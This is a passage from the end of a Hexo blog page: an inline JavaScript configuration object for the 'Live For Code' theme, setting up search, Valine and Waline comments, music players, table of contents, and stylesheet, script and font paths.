            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
                placeholder : "搜索",
                empty       : "未发现与 「${query}」 相关的内容",
                stats       : "${hits} 条相关条目，使用了 ${time} 毫秒",
            }
        }, 

        Comment : {
            switch : true,
            type   : "Valine",
        },

        Waline : {
            el              : ".comments-content",
            serverURL       : "",
            path            : window.location.pathname,
            meta            : "['nick', 'mail', 'link']",
            requiredMeta    : "['nick', 'mail']",
            pageSize        : 10,
            lang            : "zh-cn",
            locale: {
                admin       : "博主",
                anonymous   : "匿名用户",
                sofa        : "快来做第一个评论的人吧 ~",
                placeholder : "你是我一生只会遇见一次的惊喜...",
            },
            dark            : "html[color-scheme='dark']",
            search          : false,
            pageview        : true,
            comment         : true,
            copyright       : false,
        },

        Valine : {
            el             : ".comments-content",
            appId          : "SVxN9Sk9mzBk4tCi9470dhDQ-gzGzoHsz",
            appKey         : "BWGcit0aZ9zv8JeQWBB0eb2s",
            serverURLs     : "",
            placeholder    : "你是我一生只会遇见一次的惊喜...",
            avatar         : "mm",
            meta           : "nick,mail,link",
            requiredFields : "nick,mail",
            pageSize       : 5,
            lang           : "zh-cn",
            visitor        : true,
            enableQQ       : true
        },

        Tocbot : {
            switch                : true,
            tocSelector           : ".toc",
            contentSelector       : ".article-body",
            headingSelector       : "h1, h2, h3, h4, h5",
            headingsOffset        : 0,
            scrollSmooth          : true,
            scrollSmoothOffset    : -5,
            positionFixedSelector : ".toc",
            positionFixedClass    : "toc-fixed",
            fixedSidebarOffset    : "",
        },

        Require : {
            baseUrl     : "/js/",
            waitSeconds : 100
        },

        Music : {
            type : "Meting"
        },
        APlayer : {
            container : ".aplayer",
            fixed     : true,
            autoplay  : false,
            loop      : "all",
            order     : "random",
            preload   : "auto",
            volume    : 0.67,
            mutex     : true,
            lrcType   : 3,
            audio     : [
                
                    {
                        name   : "Endless Tears",
                        artist : "CLIFF EDGE",
                        cover  : "/music/cover/Endless Tears.jpg",
                        url    : "/music/song/Endless Tears.mp3",
                        lrc    : "/music/lrc/Endless Tears.lrc"
                    },
                
            ]
        },
        Meting : {
            api      : "https://api.i-meto.com/meting/api",
            id       : "3778678", 
            lrcshow  : false, 
            server   : "netease", 
            type     : "playlist", 
            fixed    : true, 
            autoplay : false, 
            loop     : "all", 
            order    : "random", 
            preload  : "auto", 
            volume   : 0.67, 
            mutex    : true
        },

        Mouse : {
            enable  : true,
            options : {
                size  : 6,
                sizeF : 24
            }
        },

        LazyLoad : {
            default : "/image/website/lazyload.svg"
        },
  
        Style : {
            aplayer          : "/css/APlayer.css",
            archive          : "/css/archive.css",
            base             : "/css/base.css",
            clipboard        : "/css/clipboard.css",
            code             : "/css/code.css",
            donate           : "/css/donate.css",
            fancybox         : "/css/jquery.fancybox.css",
            footer           : "/css/footer.css",
            iconfont         : "/iconfont/iconfont.css",
            index            : "/css/index.css",
            menuBubble       : "/css/menu-bubble.css",
            mouse            : "/css/mouse.css",
            page             : "/css/page.css",
            post             : "/css/post.css",
            search           : "/css/search.css",
            tocbot           : "/css/tocbot.css",
            valine           : "/css/valine.css",
            waline           : "/css/waline.css",
            walineCustom     : "/css/waline-custom.css"
        },

        Script: {
            aplayer          : "/js/APlayer.min.js",
            config           : "/js/require.config.js",
            index            : "/js/index.js",
            instantSearch    : "/js/instantsearch.min.js",
            iscroll          : "/js/iscroll.js",
            jQuery           : "/js/jquery-3.4.1.min.js",
            loading          : "/js/loading.js",
            meting           : "/js/Meting.min.js",
            require          : "/js/require.min.js",
            waline           : "/js/waline.mjs",
            pageview         : "/js/pageview.mjs",
            comment          : "/js/comment.mjs",
        },

        Font: {
            LongCang    : "/font/LongCang.css",
            Monda       : "/font/Monda.css",
            NotoSansSC  : "/font/NotoSansSC.css",
            NotoSerifSC : "/font/NotoSerifSC.css",
            Playball    : "/font/Playball.css",
            PTMono      : "/font/PTMono.css",
            Roboto      : "/font/Roboto.css",
            RobotoSlab  : "/font/RobotoSlab.css",
            Rosario     : "/font/Rosario.css",
            UbuntuMono  : "/font/UbuntuMono.css"
        },

        Suffix : {
            about : "原神,启动！"
        },
            
        Theme : {
            url  : "https://github.com/first19326/Hexo-LiveForCode",
            name : "Hexo - Live For Code"
        }  
    };
</script>
    <script type="text/javascript" src="/js/index.js"></script>
</body>
</html>